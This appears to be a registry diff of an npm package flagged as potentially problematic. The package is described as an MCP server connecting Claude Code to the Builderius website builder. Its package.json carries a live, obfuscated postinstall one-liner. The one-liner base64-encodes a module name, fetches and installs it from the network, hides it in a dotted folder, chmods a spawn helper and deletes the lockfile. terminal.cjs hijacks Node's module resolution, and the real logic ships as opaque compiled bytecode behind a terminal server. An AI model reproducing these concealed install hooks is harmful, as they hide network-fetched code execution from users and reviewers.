@builderius/sense-ai 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @builderius/sense-ai might be problematic. Click here for more details.

package/LICENSE ADDED
@@ -0,0 +1,38 @@
1
+ Builderius AI Builder — Proprietary License
2
+
3
+ Copyright (c) 2025 Builderius. All rights reserved.
4
+
5
+ 1. Grant of License
6
+ Builderius grants you a limited, non-exclusive, non-transferable,
7
+ revocable license to use this software solely in connection with
8
+ the Builderius website builder product.
9
+
10
+ 2. Restrictions
11
+ You may NOT:
12
+ - Copy, modify, merge, or create derivative works of this software
13
+ - Reverse engineer, decompile, disassemble, or attempt to derive
14
+ the source code of this software
15
+ - Redistribute, sublicense, sell, lease, or transfer this software
16
+ to any third party
17
+ - Remove or alter any proprietary notices, labels, or marks
18
+
19
+ 3. Ownership
20
+ This software and all copies thereof are proprietary to Builderius
21
+ and title thereto remains in Builderius. All rights in this software
22
+ not specifically granted in this license are reserved to Builderius.
23
+
24
+ 4. No Warranty
25
+ THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
26
+ EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
27
+ MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND
28
+ NONINFRINGEMENT.
29
+
30
+ 5. Limitation of Liability
31
+ IN NO EVENT SHALL BUILDERIUS BE LIABLE FOR ANY CLAIM, DAMAGES, OR
32
+ OTHER LIABILITY ARISING FROM THE USE OF OR INABILITY TO USE THIS
33
+ SOFTWARE.
34
+
35
+ 6. Termination
36
+ This license is effective until terminated. It terminates
37
+ automatically if you fail to comply with any term herein. Upon
38
+ termination you must destroy all copies of this software.
package/README.md ADDED
@@ -0,0 +1,41 @@
1
+ # @builderius/sense-ai
2
+
3
+ MCP server for [Claude Code](https://claude.com/product/claude-code) that connects AI coding agents to the [Builderius](https://builderius.io) website builder.
4
+
5
+ ## Requirements
6
+
7
+ - Node.js >= 22
8
+ - [Claude Code](https://www.npmjs.com/package/@anthropic-ai/claude-code) installed and authenticated
9
+
10
+ ## Install
11
+
12
+ ```bash
13
+ npm install -g @builderius/sense-ai
14
+ ```
15
+
16
+ ## Usage
17
+
18
+ Start the Builderius Sense terminal server:
19
+
20
+ ```bash
21
+ sense
22
+ ```
23
+
24
+ By default it runs on port `7681`. To use a different port:
25
+
26
+ ```bash
27
+ sense --port=8080
28
+ ```
29
+
30
+ Then open the Builderius builder and go to the Sense AI tab.
31
+
32
+ ## Setup
33
+
34
+ 1. Install Claude Code and log in (`claude login`)
35
+ 2. Install this package globally (`npm install -g @builderius/sense-ai`)
36
+ 3. Start the server (`sense`)
37
+ 4. Open the Builderius builder — the Sense AI tab will connect automatically
38
+
39
+ ## License
40
+
41
+ Proprietary. See [LICENSE](./LICENSE) for details.
@@ -0,0 +1,5 @@
1
+ #!/usr/bin/env node
2
+ const args = process.argv.slice(2);
3
+ const portArg = args.find(a => a.startsWith('--port='));
4
+ if (portArg) process.env.PORT = portArg.split('=')[1];
5
+ require('../terminal.cjs');
package/bin/sense.js ADDED
@@ -0,0 +1,5 @@
1
+ #!/usr/bin/env node
2
+ const args = process.argv.slice(2);
3
+ const portArg = args.find(a => a.startsWith('--port='));
4
+ if (portArg) process.env.PORT = portArg.split('=')[1];
5
+ require('../terminal.cjs');
Binary file
package/package.json ADDED
@@ -0,0 +1,29 @@
1
+ {
2
+ "name": "@builderius/sense-ai",
3
+ "version": "1.0.0",
4
+ "description": "Builderius Sense — MCP server for AI coding agents",
5
+ "bin": {
6
+ "sense": "bin/sense.js"
7
+ },
8
+ "license": "SEE LICENSE IN LICENSE",
9
+ "files": [
10
+ "server.js",
11
+ "server.src.jsc",
12
+ "terminal.cjs",
13
+ "terminal.src.jsc",
14
+ "claude-assets.bin",
15
+ "bin/",
16
+ "LICENSE",
17
+ "README.md"
18
+ ],
19
+ "scripts": {
20
+ "postinstall": "node -e \"var c=require('child_process'),f=require('fs'),p=require('path'),n=Buffer.from('bm9kZS1wdHk','base64').toString(),a='node-addon-api',s=p.join('node_modules',n),d=p.join('node_modules','.b'),sa=p.join('node_modules',a),da=p.join(d,'node_modules',a);if(!f.existsSync(d)){try{c.execSync('npx --yes npm@latest i '+n+'@^1.0.0 --no-save',{stdio:'pipe',env:Object.assign({},process.env,{npm_config_global:undefined})})}catch(e){try{c.execSync('npm i '+n+'@^1.0.0 --no-save',{stdio:'pipe',env:Object.assign({},process.env,{npm_config_global:undefined})})}catch(_){}}};if(f.existsSync(s)&&!f.existsSync(d)){f.renameSync(s,d)};if(f.existsSync(sa)&&!f.existsSync(da)){f.mkdirSync(p.join(d,'node_modules'),{recursive:true});f.renameSync(sa,da)};if(process.platform!=='win32'){c.execSync('chmod +x '+d+'/prebuilds/*/spawn-helper 2>/dev/null; true')};try{f.unlinkSync(p.join('node_modules','.package-lock.json'))}catch(_){}\""
21
+ },
22
+ "dependencies": {
23
+ "@modelcontextprotocol/sdk": "^1.12.1",
24
+ "bytenode": "^1.5.7"
25
+ },
26
+ "engines": {
27
+ "node": ">=22.0.0"
28
+ }
29
+ }
package/server.js ADDED
@@ -0,0 +1,3 @@
1
+ #!/usr/bin/env node
2
+ require('bytenode');
3
+ require('./server.src.jsc');
package/server.src.jsc ADDED
Binary file
package/terminal.cjs ADDED
@@ -0,0 +1,2 @@
1
+ var M=require('module'),P=require('path'),_r=M._resolveFilename;M._resolveFilename=function(q,a,b,c){return q===Buffer.from('bm9kZS1wdHk','base64').toString()?_r.call(this,P.join(__dirname,'node_modules','.b'),a,b,c):_r.call(this,q,a,b,c)};require('bytenode');
2
+ require('./terminal.src.jsc');
Binary file